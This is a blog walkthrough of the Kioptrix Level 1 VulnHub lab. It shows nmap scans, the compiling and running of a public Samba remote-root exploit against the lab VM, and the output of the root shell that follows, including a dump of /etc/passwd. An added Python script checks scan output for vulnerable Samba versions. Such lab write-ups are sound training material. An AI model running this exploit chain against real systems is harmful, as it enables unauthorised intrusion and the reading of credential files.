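Kioptrix Level 1 VulnHub Boot2Root
I. Introduction
Machine URL: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Description: This Kioptrix VM image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.
II. Environment Setup
Download the VM image from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Kali: 192.168.2.133 Target: 192.168.2.227
III. Penetration Walkthrough
Scan the network with nmap to find the target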
nmap 192.168.2.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 22:38 CST
Nmap scan report for RM2100.lan (192.168.2.1)
Host is up (0.0034s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1080/tcp open  socks

Nmap scan report for chuangmi-plug-v3_miap5EDA.lan (192.168.2.100)
Host is up (0.0047s latency).
All 1000 scanned ports on chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) are closed

Nmap scan report for MiAiSoundbox.lan (192.168.2.117)
Host is up (0.0058s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
53/tcp open  domain

Nmap scan report for zedeMacBook-Pro.lan (192.168.2.120)
Host is up (0.00055s latency).
All 1000 scanned ports on zedeMacBook-Pro.lan (192.168.2.120) are closed (720) or filtered (280)

Nmap scan report for bad.lan (192.168.2.133)
Host is up (0.00068s latency).
All 1000 scanned ports on bad.lan (192.168.2.133) are closed

Nmap scan report for lumi-gateway-v3_miio87687718.lan (192.168.2.153)
Host is up (0.0089s latency).
All 1000 scanned ports on lumi-gateway-v3_miio87687718.lan (192.168.2.153) are closed

Nmap scan report for 192.168.2.227
Host is up (0.0023s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm
This confirms the target's IP address is 192.168.2.227. Next, run a full-port scan with service and OS detection:
xiaoze@bad:~/下载$ sudo nmap -sS -sV -O -T4 -p- 192.168.2.227
[sudo] xiaoze 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 23:20 CST
Nmap scan report for 192.168.2.227
Host is up (0.00064s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:50:56:3D:E9:32 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.92 seconds
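Nessus scan results (I'm still too green, so I have to lean on Nessus)
This confirmed that Samba is vulnerable. A search on https://www.exploit-db.com/ turned up "Samba < 2.2.8 (Linux/BSD) - Remote Code Execution".
The download is an XX.c file; compile it with gcc.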
xiaoze@bad:~/下载$ gcc samba.c -o exploit
xiaoze@bad:~/下载$ ll
总用量 92
-rwxr-xr-x 1 xiaoze xiaoze 41256 8月 29 00:11 exploit
-rw-r--r-- 1 xiaoze xiaoze 45115 8月 28 22:24 samba.c
xiaoze@bad:~/下载$ ./exploit samba-2.2.8./exploit -b 0 192.168.2.227
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
pwd
/tmp
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
rpm:x:37:37::/var/lib/rpm:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
pcap:x:77:77::/var/arpwatch:/bin/nologin
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
cat /ver/mail/root
cat: /ver/mail/root: No such file or directory
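Seen from the defender's side, the version scan above is an inventory problem: nmap's banner for port 139 carries no Samba version, so a remote scan alone cannot tell whether the host falls in the "Samba < 2.2.8" range named in the advisory title. The following script is an added example, not part of the original post; it parses the open-port lines from that scan and classifies Samba listeners. The function names and the rule of comparing only against the 2.2.8 boundary from the title are assumptions made for illustration.

```python
import re

# Sample input: open-port lines taken from the `nmap -sV` output on this page,
# embedded here so the script runs offline.
NMAP_SV = """\
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
"""

LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
SAMBA_VER = re.compile(r"\bSamba (?:smbd )?(\d+)\.(\d+)\.(\d+)([a-z]?)")
# Assumption: the only boundary used is the one in the advisory title (Samba < 2.2.8).
FIXED = (2, 2, 8, "")

def parse_services(text):
    """Return [(port, proto, service, banner)] for every open-port line."""
    return [(int(m[1]), m[2], m[3], m[4].strip())
            for m in map(LINE.match, text.splitlines()) if m]

def samba_status(banner):
    """Classify a banner: 'not-samba', 'unknown-version', 'affected' or 'ok'."""
    if "Samba" not in banner:
        return "not-samba"
    m = SAMBA_VER.search(banner)
    if not m:
        # The remote banner hides the version; confirm on the host with `smbd -V`.
        return "unknown-version"
    ver = (int(m[1]), int(m[2]), int(m[3]), m[4])  # letter suffix sorts after none
    return "affected" if ver < FIXED else "ok"

def audit(text):
    """Map port -> status for every Samba listener found in the scan output."""
    return {port: st for port, _, _, banner in parse_services(text)
            if (st := samba_status(banner)) != "not-samba"}

if __name__ == "__main__":
    for port, status in audit(NMAP_SV).items():
        print(f"{port}/tcp samba: {status}")
```

An "unknown-version" result should be treated as a finding to follow up with an authenticated or local check, which is the gap the Nessus scan filled in this walkthrough.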
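Article URL: http://www.ouyangxiaoze.com/2020/08/656.html
Tags: Kioptrix, Kioptrix Level 1
Copyright notice: This is an original article and the copyright belongs to 欧阳小泽. You are welcome to share it; please credit the source when reposting!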
Posted 2021-11-25 18:53, first comment
Is this blog for sale?